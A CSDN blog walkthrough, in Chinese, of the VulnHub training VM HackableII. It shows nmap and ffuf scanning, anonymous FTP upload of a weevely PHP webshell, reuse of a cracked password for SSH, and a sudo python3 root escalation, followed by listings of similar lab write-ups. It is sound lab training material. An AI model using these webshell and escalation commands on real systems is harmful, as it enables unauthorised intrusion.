Vulnhub:HackableII靶机渗透测试

最新推荐文章于 2024-08-31 21:24:29 发布
最新推荐文章于 2024-08-31 21:24:29 发布
阅读量424 收藏 7
点赞数 10
文章标签: 网络 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xyc_0/article/details/135131984
版权

 

一、环境介绍

渗透机:kali 2023

靶机:hackableII

靶机下载地址:https://download.vulnhub.com/hackable/hackableII.ova

二、信息收集

靶机IP:192.168.1.103

扫描靶机获取版本信息

nmap -sV 192.168.1.103

发现靶机80端口开启http服务,登录靶机网址

查看页面源代码发现提示

Do you like gobuster? dirb? etc...

扫描一下网站目录

ffuf -u http://192.168.1.103//FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -ic -c -e .php,.txt,.html

发现一个files,访问一下有点像ftp页面

三、渗透测试

匿名登录一下靶机ftp

登录成功,我们用weevely工具生成一个名为shell.php密码为passwd的webshell文件

weevely generate passwd ./shell.php

用ftp上传webshell

put shell.php

刷新一下可以看到网页已经多了一个shell.php文件


我们用weevely工具连接webshell获取靶机shell

weevely http://192.168.1.103/files/shell.php passwd

我们在靶机目录里找一下可疑文件

 

在home目录里发现一个/.runme.sh文件,查看后发现一个md5值应该是密码,md5解密一下

cf4c2232354952690368f1b3dfdfb24d

看到靶机还开着ssh服务,我们远程连接一下,账号用文件查看到的:shrek 密码:onion

ssh shrek@192.168.1.103

sudo提权

sudo /usr/bin/python3.5 -c 'import pty;pty.spawn("/bin/bash")'

成功拿到靶机root权限,实验结束

Attach_1
关注
  • 10
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机hackme(DHCP)渗透测试
Long_gone的博客
12-04 1349
一、扫描 靶机打开后先用攻击机扫描靶机的IP地址: arp-scan 192.168.34.0/24 经过排除,确定靶机IP地址为:192.168.34.154,然后扫描一下靶机的端口开放情况: nmap -sV -A -p 0-65535 192.168.34.154 发现靶机只开放了22和80端口,然后再扫描一下80端口的目录: dirb http://192.168.34.154 ...
vulnhub靶机HA wordy渗透测试
Long_gone的博客
10-04 657
打开靶机后,先扫描一下靶机IP是多少: netdiscover 由经验推断出靶机IP为:192.168.34.224,然后使用使用nmap扫描一下靶机端口开放情况: nmap -sV -p 0-65535 192.168.34.224 发现有http端口开放,然后访问一下看看: 在页面并没有什么发现,然后我们先使用目录爆破一下看看: dirb http://192.168.34.224:...
Vulnhub靶机hackableII
qq_48904485的博客
02-12 442
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机hackableII(10.0.2.52)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/hackable-ii,711/
Vulnhub-HACKABLE: II渗透
laoyanCZ的博客
01-07 1169
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
靶机渗透练习15-Hackable II
hirak0的博客
04-15 999
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackable-ii,711/ Description difficulty: easy This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.6 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建如
靶场练习第十八天~vulnhub靶场之hackableII
qq_57976347的博客
02-17 662
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Hackable: II ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 正在上传…重新上传取消 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -sC -A -p- 192.168.101.124 2.网站信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什
看完这篇 教你玩转渗透测试靶机vulnhub——hackableII
Aluxian_的博客
10-07 1300
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。这个靶机很简单就一个提权是新知识点 别的信息收集,FTP匿名,回弹shell md5解码都是之前做过的!
Stapler:1 靶机渗透测试-Vulnhub(STAPLER: 1)
m0_68117643的博客
08-01 1841
靶机(stapler:1)直接导入Vmware无法使用,可先使用VirtualBox打开后再导出虚拟机,使用Vmware打开即可。 思路:12380端口扫描—wpscan爆破用户名——文件包含漏洞利用——修改管理员账户密码——上传webshell——sudo提权......
Vulnhub-Lampiao 靶机渗透
Majula
01-30 2229
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub-SolidState: 1靶机渗透测试
m0_68117643的博客
07-05 914
vulnhub-SolidState: 1靶机渗透测试
VulnHub:FunBoxLunchBreaker靶机
qq_39428734的博客
04-13 243
扫描局域网内存活主机 使用nmap扫描靶机开放了哪些端口 发现了21和22和80端口,21端口允许匿名登录,我们使用匿名用户登录 我们把这些文件下载下来 在wordpress里面查看到了他的配置文件 我们把它下载下来 Wp-config里有数据库密码,我们先把那两串加密文字解密出来 Brainfuck解密得到 剩下一个base64的密文 得到了信息接下来要去80端口的网页上搜集信息 主页就一张图片并没有什么信息 查看网页源代码 这个收集到两个用户名
Hackable II靶机
logan_logan的博客
07-17 418
1.使用nmap端口扫描 端口扫描时发现开启了ftp服务,并且可以匿名登录; 2.匿名登录FTP服务 经过测试,可以上传和下载文件; 3.使用nikto工具进行扫描 得到了一个/files目录,在网页打开; 4.网页打开files这个目录; 在网页打开之后发现与之前FTP登录时看到的文件一致, 5.上传PHP文件,反弹shell 在kali里面使用nc监听端口,成功获取shell; 6.切换到home目录下找到一个important.txt文件 查看之后提示我们运行runme.sh文件; 7.运
vulnhub--Hackable: II
venu_s的博客
06-30 301
靶机介绍 difficult:easy download:https://www.vulnhub.com/entry/hackable-ii,711/ 信息探测 还是常规的进行主机发现、端口扫描和目录扫描,尽可能的收集信息 主机发现 端口扫描 开放了21,22,80端口,其中21端口可以使用anonymous身份进行登录 目录扫描 有一个/files目录 访问80端口,是一个Apache的默认页面 查看网页源代码,提示进行目录扫描,已经扫描过了 访问/files,有一个CALL.html文件 内容
vulnhub实验HACKABLEII
weixin_44687621的博客
08-04 293
1.环境配置 在官网上下载镜像:http://www.vulnhub.com/entry/hackable-ii,711/ 经过测试,发现如果放在vmware上面,是无法获得virtualbox上靶机的ip地址的,也就无法进行渗透测试了 于是重新安装kali到virtualbox上 kali镜像下载:https://www.kali.org/get-kali/#kali-virtual-machines 这里可以直接选择virtualbox的文件进行下载,就省去了安装等的一系列操作 导入之后,启动会出现us
Vulnhub_hackableII
qq_45434762的博客
07-02 497
主机信息kali:192.168.1.7 hackableII:192.168.1.8 信息收集通过nmap扫描目标主机发现开放了3个端口,并且ftp可匿名登录nmap -T4 -A -v...
VulnHub-hackableII
sanqin_的博客
07-04 363
靶机 DHCP 未能正确分配 IP :看这里 靶机地址:http://www.vulnhub.com/entry/hackable-ii,711/ 按照流程先用nmap扫描 nmap -sP ip/mask #扫描局域网内存活主机 nmap -sV -A -p- ip #扫描靶机开放服务 该靶机21端口开放ftp,22端口开放ssh,80端口开放http 访问http,是apache的默认页面,不过提示了使用dirb扫描 在扫描的同时用匿名用户查看一下ftp 匿名用户名:anonymous 密码:
安全vulnhub实验HACKABLE: II
qq_43017750的博客
06-29 1965
实验环境下载链接:https://download.vulnhub.com/hackable/hackableII.ova 注意:使用vbox打开,vmware打开可能会导致虚拟机网卡获取不到地址 修改虚拟机网卡设置为仅主机(Host-Only)网络 实验步骤: 1.主机发现 c:\>nmap -PR -sn -n 192.168.56.0/24 Starting Nmap 7.00 ( https://nmap.org ) at 2021-06-29 11:38 ?D1ú±ê×?ê±?? Nma
网络压缩之网络剪枝(network pruning)
最新发布
前行居士
08-31 886
网络剪枝(network pruning)就是要把网络里面的一些参数剪掉。剪枝就是修剪的意思,把网络里面的一些参数剪掉。为什么可以把网络里面的一些参数剪 掉呢?这么大的网络里面有很多很多的参数,每一个参数不一定都有在做事。参数这么多的 时候,也许很多参数只是在划水,什么事也没有做。这些没有做的参数放在那边,就只是占空 间而已,浪费计算资源而已。为何就把它们剪掉呢?所以网络剪枝就是把一个大的网络中没 有用的那些参数把它找出来,把它扔掉。人刚出生的时候,脑袋是空空的,神经元跟神经元间 没什么连接
渗透测试实战:Windows靶机的FTP与IIS漏洞探索
在本篇渗透测试学习笔记案例三中,作者分享了如何进行实际渗透测试的过程。首先,实验环境设定在一个目标靶机(10.11.1.0/24)和攻击机(Kali Linux,10.11.0.90)的场景下。目标靶机IP为10.11.1.13,攻击者利用Nmap...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值